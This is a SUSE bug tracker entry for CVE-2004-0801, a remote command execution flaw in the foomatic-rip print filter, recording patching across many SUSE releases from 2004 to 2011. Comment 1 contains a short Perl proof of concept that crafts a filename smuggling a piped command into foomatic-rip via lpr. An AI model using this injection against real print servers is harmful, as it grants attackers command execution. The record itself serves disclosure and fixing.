Bug 59233 - (CVE-2004-0801) VUL-0: CVE-2004-0801: remote command execution in foomatic-rip-hplip
(CVE-2004-0801)
VUL-0: CVE-2004-0801: remote command execution in foomatic-rip-hplip
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: General
unspecified
All Linux
: P2 - High : Major
: ---
Assigned To: Security Team bot
E-mail List
maint:released:11.3:42630 maint:relea...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2004-08-25 22:41 UTC by Sebastian Krahmer
Modified: 2019-05-01 15:20 UTC (History)
3 users (show)

See Also:
Found By: Other
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
the fix which came via vendor-sec (8.65 KB, patch)
2004-08-27 16:58 UTC, Sebastian Krahmer
Details | Diff
patchinfo 8.1,8.2 (795 bytes, text/plain)
2004-08-31 17:51 UTC, Ludwig Nussel
Details
patchinfo 9.0, 9.1 (834 bytes, text/plain)
2004-08-31 17:52 UTC, Ludwig Nussel
Details
patchinfo sles8 (623 bytes, text/plain)
2004-08-31 17:52 UTC, Ludwig Nussel
Details
patchinfo sles9 (630 bytes, text/plain)
2004-08-31 17:53 UTC, Ludwig Nussel
Details

Note You need to log in before you can comment on or make changes to this bug.
Description Sebastian Krahmer 2004-08-25 22:41:30 UTC
The foomatic-rip filter is horrible code, security wise.
It allows for executing arbitrary commands.
Attackers need printing access.
Comment 1 Sebastian Krahmer 2004-08-25 22:41:30 UTC
<!-- SBZ_reproduce  -->
On the CUPS server, execute:

#!/usr/bin/perl

# CUPS PoC remote exploit, requires printing access.
# Bug is in foomatic-rip perl script. it opens PPD-files
# without < so if theres a | at the end, it interprets them
# as command. Furthermore, the arguments for the script are 
# merged into one string and afterwards regex'e out. This allows
# for faking arguments via filenames.

my $ip = "127.0.0.1";
my $ppd_file =  "\x01-p\x01|\$(find)|\x01x";
open O, ">$ppd_file" or die $!;
print O "Foo!\n";
close O;

exec("lpr", "./$ppd_file");

And see whether a "find" command is started by cups server afterwards.
tested on a SL 8.2, but the current foomatic-rip script seems to be the same
and still contains the bugs.
Comment 2 Klaus Singvogel 2004-08-26 22:51:36 UTC
Patches made and new packages submitted. 
Please note that this affects package cups (<= SL9.0) and later 
foomatic-filters (SL9.1, SL9.2) 
 
Security-team, please handle the rest of the update process: putonftp, etc. 
 
affected are all SUSE Linux versions. 
Comment 3 Sebastian Krahmer 2004-08-27 16:38:23 UTC
CAN-2004-0801
Comment 4 Sebastian Krahmer 2004-08-27 16:58:28 UTC
Created attachment 22980 [details]
the fix which came via vendor-sec

...
Comment 5 Marcus Meissner 2004-08-30 19:41:31 UTC
CRD around sept. 7 2004. 
Comment 6 Marcus Meissner 2004-08-30 19:42:43 UTC
fromn vendor-sec CRD summary: 
 
CAN-2004-0801       foomatic            Sep 14 ????UTC(*3)                       
CAN-2004-0558       CUPS(*1)            Sep 06 ????UTC                           
 
*1: this cups issue seems to be a mess, from what I've seen, upstream is         
going to release information for this issue on Sept 1, then 1.1.21 should        
come out on Sept 7, some on the list seem to think we're releasing on Sept       
06.  The foomatic issue will probably dictate this since it's a bit higher       
priority.                                                                        
 
*3: These are suggested release dates, if these are problems for anyone, you     
should probably speak up.                                                        
Comment 7 Klaus Singvogel 2004-08-30 19:52:12 UTC
working on again on a solution, which covers the vendor-sec patches. 
have to adapt the patches to the old versions of foomatic-rip and its 
predecessor cupsomatic. 
wait with tests till I'm ready, please. 
Comment 8 Klaus Singvogel 2004-08-31 01:25:12 UTC
finished with the patches (again :-) 
security-team please procede in the usual way. 
 
Patch-Management: 
Please check if printing with non PostScript printers in older SuSE Linux 
versions is still possible. Didn't have time to install and test these 
versions and the patches differ! TIA 
Comment 9 Ludwig Nussel 2004-08-31 17:51:59 UTC
Created attachment 23054 [details]
patchinfo 8.1,8.2
Comment 10 Ludwig Nussel 2004-08-31 17:52:15 UTC
Created attachment 23055 [details]
patchinfo 9.0, 9.1
Comment 11 Ludwig Nussel 2004-08-31 17:52:46 UTC
Created attachment 23056 [details]
patchinfo sles8
Comment 12 Ludwig Nussel 2004-08-31 17:53:03 UTC
Created attachment 23057 [details]
patchinfo sles9
Comment 13 Sebastian Krahmer 2004-09-15 23:11:00 UTC
advisories and packages are out
Comment 14 Marcus Meissner 2006-05-16 09:58:49 UTC
The foomatic fix was reverted and is not in the current packages!
Affected: 9.3, 10.0 and 10.1
Not Affected: SLES9, 9.2

So those are still exploitable by this problem.
Comment 15 Marcus Meissner 2006-05-19 12:59:50 UTC
critical.
Comment 16 Klaus Singvogel 2006-05-23 19:10:47 UTC
fixed packages submitted for: 9.3, 10.0, 10.1 and STABLE
security-team handle please rest of process: swamp-id, patchinfo, etc. TIA
Comment 17 Marcus Meissner 2006-05-24 08:59:56 UTC
swamp: 4432
Comment 18 Marcus Meissner 2006-05-29 11:57:17 UTC
approved the update. thanks!
Comment 19 Thomas Biege 2009-10-13 19:49:02 UTC
CVE-2004-0801: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Comment 21 Swamp Workflow Management 2011-08-08 14:55:33 UTC
The SWAMPID for this issue is 42548.
This issue was rated as moderate.
Please submit fixed packages until 2011-08-22.
When done, please reassign the bug to security-team@suse.de.
Patchinfo will be handled by security team.
Comment 22 Johannes Meixner 2011-08-09 13:38:05 UTC
FYI regarding SLE11-SP2:
Submitted HPLIP 3.11.5 to SUSE:SLE-11-SP2:GA
via submitrequest 14060:
Version upgrade to HPLIP 3.11.5 (Fate #312667)
plus fixed CVE-2011-2697 (Bug #698451) plus
fixed leftover in CVE-2004-0801 (Bug #59233).
Comment 26 Johannes Meixner 2011-08-10 13:11:57 UTC
Submitted hplip to SUSE:SLE-11-SP1:Update:Test
via submitrequest 14078:
Fixed CVE-2011-2697 (bnc#698451) plus
fixed leftover in CVE-2004-0801 (bnc#59233)
Comment 27 Johannes Meixner 2011-08-10 13:15:04 UTC
From my point of view the issue is now fixed
in all maintained SLE products.
Comment 28 Johannes Meixner 2011-08-11 15:05:08 UTC
Submitted hplip to openSUSE:11.3:Update:Test
via submitrequest 78534:
  Fixed CVE-2011-2697 (bnc#698451) plus
  fixed leftover in CVE-2004-0801 (bnc#59233)
Comment 29 Johannes Meixner 2011-08-11 15:25:56 UTC
Submitted hplip to openSUSE:11.4:Update:Test
via submitrequest 78539:
  Fixed CVE-2011-2697 (bnc#698451) plus
  fixed leftover in CVE-2004-0801 (bnc#59233)
Comment 30 Johannes Meixner 2011-08-11 15:26:39 UTC
From my point of view the issue is now fixed
in all maintained products.
Comment 31 Johannes Meixner 2011-08-11 15:28:32 UTC
Reopening and reassign to security-team@suse.de
according to comment #21.
Comment 32 Johannes Meixner 2011-08-12 12:22:16 UTC
FYI regarding openSUSE:Factory:

Fixed via version upgrade to current HPLIP 3.11.7
and changes to avoid the security issues.

Submitted HPLIP 3.11.7 to the
OBS Printing project via submitrequest 78629 and to
openSUSE:Factory via submitrequest 78646:
  Version upgrade to HPLIP 3.11.7 and
  avoid CVE-2011-2697 (bnc#698451)
  plus CVE-2004-0801 (bnc#59233)
  by no longer installing foomatic-rip-hplip and
  using foomatic-rip from the foomatic-filters RPM instead

From my point of view the issue is now completely
fixed in all products.
Comment 33 Thomas Biege 2011-08-12 12:49:00 UTC
Thanks.
Comment 34 Swamp Workflow Management 2011-08-25 11:44:53 UTC
Update released for: hplip, hplip-debuginfo, hplip-debugsource, hplip-hpijs, hplip-hpijs-debuginfo
Products:
openSUSE 11.3 (debug, i586, x86_64)
openSUSE 11.4 (debug, i586, x86_64)
Comment 35 Swamp Workflow Management 2011-08-25 14:03:10 UTC
Update released for: hplip, hplip-debuginfo, hplip-debugsource, hplip-hpijs
Products:
SLE-DEBUGINFO 11-SP1 (i386, ia64, ppc64, s390x, x86_64)
SLE-DESKTOP 11-SP1 (i386, x86_64)
SLE-SERVER 11-SP1 (i386, ia64, ppc64, s390x, x86_64)
SLE-SERVER 11-SP1-TERADATA (x86_64)
SLES4VMWARE 11-SP1 (i386, x86_64)
Comment 36 Marcus Meissner 2011-09-16 13:05:44 UTC
seems we can close it
Comment 38 Bernhard Wiedemann 2016-04-15 10:57:44 UTC
This is an autogenerated message for OBS integration:
This bug (59233) was mentioned in
https://build.opensuse.org/request/show/78534 11.3:Test / hplip
https://build.opensuse.org/request/show/78539 11.4:Test / hplip
https://build.opensuse.org/request/show/78646 Factory / hplip